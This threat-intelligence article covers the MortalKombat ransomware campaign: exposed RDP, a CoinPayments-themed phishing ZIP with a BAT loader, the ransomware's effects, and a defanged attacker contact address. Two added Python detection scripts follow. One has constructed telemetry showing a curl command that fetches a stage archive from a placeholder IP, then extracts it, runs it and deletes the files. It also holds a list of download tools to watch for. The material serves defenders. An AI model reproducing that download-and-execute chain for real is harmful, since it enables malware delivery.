
MortalKombat Ransomware

Since December 2022, an unidentified threat actor has been using two relatively new malicious programs, the MortalKombat Ransomware and a GO variant of the Laplas Clipper malware, to steal cryptocurrency from victims. The attacker scans the Internet for machines with an exposed Remote Desktop Protocol (RDP) service on port 3389 and uses that access to get into the victim's system without authorization. The attacker also operates a download server, which hosts the MortalKombat Ransomware, to deliver the payloads. Details about the malware tools and the campaign were released in a report by malware researchers.
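Exposed RDP is the initial-access vector described above, and the symptom defenders can actually see is a burst of failed logons from one Internet address followed by a successful RemoteInteractive logon from the same address. The following Python script is an added example (not code from the page or from the researchers' report) of that check. It assumes the Windows Security log has already been exported as JSON lines with the fields shown (event 4625 = failed logon, 4624 = successful logon, logon_type 10 = RDP); the log lines themselves are constructed.

```python
"""Flag RDP logons that follow a burst of failed logons from the same source.

Added example, not code from the original page or the researchers' report.
Assumes Security log events exported as JSON lines with the fields used
below; the sample lines are constructed, not real telemetry.
"""
import json
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: one Internet host hammers the exposed RDP service and
# eventually authenticates; an internal user mistypes a password once.
SAMPLE_LOG = "\n".join([
    '{"time": "2022-12-14T03:10:01", "id": 4625, "ip": "203.0.113.10", "user": "administrator", "logon_type": 10}',
    '{"time": "2022-12-14T03:10:04", "id": 4625, "ip": "203.0.113.10", "user": "admin", "logon_type": 10}',
    '{"time": "2022-12-14T03:10:07", "id": 4625, "ip": "203.0.113.10", "user": "backup", "logon_type": 10}',
    '{"time": "2022-12-14T03:10:11", "id": 4625, "ip": "203.0.113.10", "user": "administrator", "logon_type": 10}',
    '{"time": "2022-12-14T03:10:15", "id": 4625, "ip": "203.0.113.10", "user": "administrator", "logon_type": 10}',
    '{"time": "2022-12-14T03:10:19", "id": 4625, "ip": "203.0.113.10", "user": "administrator", "logon_type": 10}',
    '{"time": "2022-12-14T03:12:40", "id": 4625, "ip": "10.0.0.5", "user": "jdoe", "logon_type": 10}',
    '{"time": "2022-12-14T03:12:55", "id": 4624, "ip": "10.0.0.5", "user": "jdoe", "logon_type": 10}',
    '{"time": "2022-12-14T03:13:30", "id": 4624, "ip": "203.0.113.10", "user": "administrator", "logon_type": 3}',
    '{"time": "2022-12-14T03:14:02", "id": 4624, "ip": "203.0.113.10", "user": "administrator", "logon_type": 10}',
])


def parse_events(text):
    """Parse JSON lines into dicts with a real timestamp, sorted by time."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        ev["time"] = datetime.fromisoformat(ev["time"])
        events.append(ev)
    return sorted(events, key=lambda e: e["time"])


def find_rdp_intrusions(events, threshold=5, window=timedelta(minutes=30)):
    """Return one hit per RDP (logon_type 10) success that was preceded by at
    least `threshold` failed logons from the same source IP inside `window`."""
    failures = defaultdict(list)  # source ip -> timestamps of 4625 events
    hits = []
    for ev in events:
        ip = ev["ip"]
        if ev["id"] == 4625:
            failures[ip].append(ev["time"])
            continue
        if ev["id"] != 4624 or ev.get("logon_type") != 10:
            continue  # only RemoteInteractive (RDP) successes matter here
        recent = [t for t in failures[ip] if ev["time"] - t <= window]
        if len(recent) >= threshold:
            hits.append({"time": ev["time"], "ip": ip,
                         "user": ev["user"], "failures": len(recent)})
        failures[ip].clear()  # a success starts a fresh count for that source
    return hits


if __name__ == "__main__":
    for hit in find_rdp_intrusions(parse_events(SAMPLE_LOG)):
        print(f"{hit['time']} RDP logon for {hit['user']} from {hit['ip']} "
              f"after {hit['failures']} failed attempts")
```

Any 4625 event at all whose source is a public address is already evidence that RDP is reachable from the Internet, which is the condition the campaign depends on; the threshold and window are assumptions to tune against your own logon volume.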

Upon analyzing the code, class names and Registry key strings of the MortalKombat Ransomware, the researchers concluded with high confidence that the threat belongs to the Xorist ransomware family. Xorist is a commodity family produced with a builder that lets the operator customize the ransom note, file extension and wallpaper; like its relatives, MortalKombat encrypts the victim's files and then demands a ransom payment in exchange for the decryption key.

The Multi-Stage Infection Chain Deploying the MortalKombat Ransomware

The attack campaign typically begins with a phishing email that delivers either the clipper or the ransomware. The attackers then cover their tracks by deleting the files they dropped, which makes it harder for incident responders and researchers to analyze the operation.

The phishing email carries a malicious ZIP file containing a BAT loader script. The lure is presented as coming from CoinPayments, a legitimate global cryptocurrency payment gateway; the company is in no way connected to these messages. To further fool targets, the sender address is spoofed.

When the victim runs the loader script, it downloads a second malicious ZIP file from an attacker-controlled hosting server onto the victim's machine, extracts it and executes the payload. The payload is either the GO variant of the Laplas Clipper malware or the MortalKombat Ransomware.

The loader script runs the payload as a process on the victim's machine and then removes the downloaded and dropped files to eliminate infection markers.
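The download, extract, execute and self-delete sequence above is what an endpoint detection should key on, because the individual tools (curl, tar, a batch file) are all legitimate on their own. The Python below is an added example (not code from the page or from the researchers' report) that reconstructs that chain from process-tree and file-deletion telemetry. It assumes Sysmon-style events already normalised to dicts of type "ProcessCreate" (pid, ppid, image, cmdline) and "FileDelete" (pid, target); the file names, paths and URL in the sample events are constructed placeholders, not indicators from the campaign.

```python
"""Reconstruct a batch-loader chain (download -> extract -> run -> delete)
from endpoint telemetry.

Added example, not code from the original page or the researchers' report.
Assumes events normalised to dicts as described in the lead-in; the sample
events, paths and URL below are constructed placeholders.
"""
import ntpath
import re
from collections import defaultdict, deque

SCRIPT_RE = re.compile(r"\.(?:bat|cmd)\b", re.I)
URL_RE = re.compile(r"https?://\S+", re.I)
ARCHIVE_RE = re.compile(r"([A-Za-z]:\\[^\s\"]+?\.(?:zip|7z|rar))", re.I)
DOWNLOADERS = {"curl.exe", "certutil.exe", "bitsadmin.exe", "wget.exe", "powershell.exe"}
EXTRACTORS = {"tar.exe", "expand.exe", "7z.exe", "unzip.exe"}
SYSTEM_TOOLS = DOWNLOADERS | EXTRACTORS | {"cmd.exe", "xcopy.exe", "conhost.exe"}

TEMP = r"C:\Users\alice\AppData\Local\Temp"  # constructed user temp directory
SAMPLE_EVENTS = [  # constructed: one loader chain plus a benign build script
    {"type": "ProcessCreate", "pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"type": "ProcessCreate", "pid": 200, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "C:\Users\alice\Downloads\payment_details\payment_details.bat"'},
    {"type": "ProcessCreate", "pid": 201, "ppid": 200, "image": r"C:\Windows\System32\curl.exe",
     "cmdline": rf"curl.exe -s -o {TEMP}\stage.zip http://198.51.100.7/stage.zip"},
    {"type": "ProcessCreate", "pid": 202, "ppid": 200, "image": r"C:\Windows\System32\tar.exe",
     "cmdline": rf"tar.exe -xf {TEMP}\stage.zip -C {TEMP}\stage"},
    {"type": "ProcessCreate", "pid": 203, "ppid": 200, "image": rf"{TEMP}\stage\svc.exe",
     "cmdline": rf"{TEMP}\stage\svc.exe"},
    {"type": "FileDelete", "pid": 200, "target": rf"{TEMP}\stage.zip"},
    {"type": "FileDelete", "pid": 200, "target": rf"{TEMP}\stage\svc.exe"},
    {"type": "ProcessCreate", "pid": 300, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c C:\build\build.bat"},
    {"type": "ProcessCreate", "pid": 301, "ppid": 300, "image": r"C:\Windows\System32\xcopy.exe",
     "cmdline": r"xcopy.exe C:\build\out C:\dist /E"},
]


def _name(path):
    return ntpath.basename(path).lower()


def _descendants(root_pid, children):
    """Breadth-first walk of the process tree below root_pid."""
    out, queue = [], deque([root_pid])
    while queue:
        for ev in children.get(queue.popleft(), []):
            out.append(ev)
            queue.append(ev["pid"])
    return out


def find_loader_chains(events, min_stages=3):
    """Return one finding per cmd.exe running a .bat/.cmd whose subtree shows
    at least `min_stages` of: download, extract, execute, cleanup."""
    children, deletes = defaultdict(list), defaultdict(list)
    for ev in events:
        if ev["type"] == "ProcessCreate":
            children[ev["ppid"]].append(ev)
        elif ev["type"] == "FileDelete":
            deletes[ev["pid"]].append(ev["target"])

    findings = []
    for ev in events:
        if ev["type"] != "ProcessCreate" or _name(ev["image"]) != "cmd.exe":
            continue
        if not SCRIPT_RE.search(ev["cmdline"]):
            continue
        tree = _descendants(ev["pid"], children)
        pids = {ev["pid"]} | {d["pid"] for d in tree}
        stages, drop_dir = [], None
        # Stage 1: a download utility fetching a URL; note where the archive lands.
        for d in tree:
            if _name(d["image"]) in DOWNLOADERS and URL_RE.search(d["cmdline"]):
                stages.append("download")
                m = ARCHIVE_RE.search(d["cmdline"])
                if m:
                    drop_dir = ntpath.dirname(m.group(1)).lower()
                break
        # Stage 2: the archive is unpacked.
        if any(_name(d["image"]) in EXTRACTORS or "expand-archive" in d["cmdline"].lower() for d in tree):
            stages.append("extract")
        # Stage 3: something that is not a known system tool runs from the drop directory.
        if drop_dir and any(d["image"].lower().startswith(drop_dir)
                            and _name(d["image"]) not in SYSTEM_TOOLS for d in tree):
            stages.append("execute")
        # Stage 4: the script or its children delete what was dropped.
        if drop_dir and any(t.lower().startswith(drop_dir) for p in pids for t in deletes.get(p, [])):
            stages.append("cleanup")
        if len(stages) >= min_stages:
            findings.append({"pid": ev["pid"], "script": ev["cmdline"], "stages": stages})
    return findings


if __name__ == "__main__":
    for f in find_loader_chains(SAMPLE_EVENTS):
        print(f"pid {f['pid']}: {' -> '.join(f['stages'])}  ({f['script']})")
```

The FileDelete stage needs Sysmon file-delete logging (or an EDR equivalent) because `del` is a cmd.exe built-in and never shows up as a process creation; that is also why the self-cleanup the page describes removes the samples but not the telemetry about them.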

The Threatening Capabilities of the MortalKombat Ransomware

Little is known about the MortalKombat Ransomware creators or their operational strategy. Both the name of the ransomware and the wallpaper it drops on the victim's system are a nod to the popular Mortal Kombat media franchise, which includes a series of video games and movies.

MortalKombat encrypts a wide range of files on the victim's machine, including system, application, database, backup and virtual machine files, as well as files on remote locations mapped as logical drives. After encrypting the files it drops a ransom note and changes the wallpaper. MortalKombat shows no wiper behavior and does not delete the Shadow Volume Copies, so shadow copies may still be usable for recovery. Instead, it corrupts Windows Explorer, removes folders and applications from the Windows startup, and disables the Run command window, rendering the machine inoperable.

The cybercriminals behind the threat use qTOX, a popular instant messaging application available on GitHub, to communicate with their victims. Additionally, they provide an email address - 'hack3dlikeapro[at]proton[.]me,' as an alternative means of communication.

Overall, MortalKombat is a damaging ransomware that can cripple victims' machines and cause the loss of valuable data. Given the two delivery paths described here, keeping RDP off the Internet and treating unsolicited payment-themed attachments with suspicion removes most of this actor's opportunities; offline backups limit the damage when a machine is hit anyway.
